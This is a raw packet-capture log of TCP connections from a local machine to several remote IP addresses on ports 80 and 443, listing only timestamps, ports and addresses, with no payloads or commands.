Dec 8, 2024 13:31:22.117027998 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.117077112 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.117136002 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.117182016 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.121249914 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.121294022 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.121323109 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.121335030 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.125296116 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.125355959 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.125392914 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.125433922 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.129107952 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.129244089 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.129260063 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.129292965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.132859945 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.132921934 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.132987976 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.133027077 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.136565924 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.136641979 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.136655092 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.136677027 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.148672104 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.148751974 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.148808956 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.149149895 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.149166107 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.150547028 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.150602102 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.150641918 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.151369095 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.151418924 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.151545048 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.151974916 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.152029037 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.152106047 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.152482033 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.152508020 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.152573109 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.152825117 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.152837992 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.152848005 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.152853966 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.153520107 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.153531075 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.154041052 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.154058933 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.154069901 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.154076099 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.154170036 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.154179096 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.157094955 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.157143116 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.157221079 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.158524036 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.158540964 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.158684969 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.158695936 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.158701897 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.158770084 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.159064054 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.159085035 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.159243107 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.159255981 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.159646988 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:22.159657955 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:22.174727917 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.174799919 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.174813032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.174848080 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.176527977 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.176588058 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.176590919 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.176676035 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.180139065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.180190086 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.180273056 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.180397034 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.183856010 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.183928013 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.183964968 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.184001923 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.187531948 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.187583923 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.187588930 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.187618017 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.191673994 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.191692114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.191745043 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.191764116 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.195036888 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.195063114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.195118904 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.198595047 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.201539993 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.236675978 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.236802101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.236890078 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.236933947 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.238091946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.238149881 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.238187075 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.238234043 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.240976095 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.241039038 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.241041899 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.241096020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.243768930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.243849993 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.243946075 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.246771097 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.246850014 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.246885061 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.246926069 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.249356985 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.249408960 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.249511957 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.249561071 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.252299070 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.252358913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.252393007 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.252432108 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.254983902 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.255069971 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.255096912 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.255106926 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.257806063 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.257869959 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.257904053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.257951975 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.260447025 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.260494947 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.260576963 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.260629892 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.263250113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.263298035 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.263411999 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.263473988 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.266001940 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.266136885 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.266192913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.268358946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.268466949 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.268516064 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.270944118 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.271019936 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.271048069 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.271106005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.273488045 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.273555040 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.273608923 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.273660898 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.276297092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.276446104 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.290965080 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:22.291023970 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:22.291026115 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:22.291073084 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:22.291136026 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:22.291150093 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:22.291163921 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:22.291189909 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:22.299787045 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.299865007 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.299875975 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.299907923 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.300992012 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.301037073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.301148891 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.301192045 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.302962065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.303025961 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.303067923 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.303106070 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.305572987 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.305596113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.305622101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.305639982 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.308115005 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.308166981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.308213949 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.308336973 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.310746908 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.310796976 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.310897112 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.310942888 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.313179016 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.313225985 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.313302994 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.313353062 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.315685034 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.315736055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.315838099 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.315885067 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.318203926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.318255901 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.318312883 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.318516970 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.320470095 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.320513964 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.320574999 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.320628881 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.322849989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.322904110 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.322930098 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.322969913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.325210094 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.325258970 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.325280905 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.325313091 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.327388048 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.327439070 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.327482939 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.327528000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.329689980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.329715967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.329735994 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.329758883 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.331980944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.332051039 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.332053900 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.332098961 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.334235907 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.334299088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.334342957 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.334391117 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.336496115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.336546898 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.366816044 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.366873026 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.366910934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.366954088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.367774010 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.367880106 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.367996931 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.368041992 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.370160103 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.370198965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.370294094 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.370388031 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.372306108 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.372428894 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.372452974 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.372473001 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.375600100 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.375649929 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.375701904 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.375745058 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.377043009 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.377090931 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.377145052 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.377183914 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.379221916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.379334927 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.379353046 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.379410982 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.381505966 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.381557941 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.381629944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.381673098 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.383893967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.383944988 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.384099960 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.384203911 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.386123896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.386225939 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.386250973 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.386348009 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.388340950 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.388442993 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.388462067 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.388530970 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.390646935 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.390775919 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.390830040 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.392903090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.392992020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.393018007 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.393063068 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.395276070 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.395345926 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.395430088 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.395473957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.428174019 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.428244114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.428303003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.429075003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.429124117 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.429446936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.429605961 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.429639101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.429649115 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.430460930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.430506945 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.430730104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.430780888 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.432337999 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.432408094 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.432439089 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.432483912 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.434065104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.434118986 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.434217930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.434274912 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.435854912 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.435899973 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.435947895 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.435990095 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.437608004 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.437649965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.437721014 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.437796116 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.439407110 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.439485073 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.439487934 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.439524889 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.441247940 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.441266060 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.441318035 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.442809105 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.442856073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.442996025 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.443061113 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.444514036 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.444561958 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.444704056 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.444747925 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.446211100 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.446255922 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.446291924 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.446337938 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.447895050 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.447943926 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.448007107 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.448050976 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.449676037 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.449738979 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.449779034 CET	80	49724	185.215.113.206	192.168.2.6
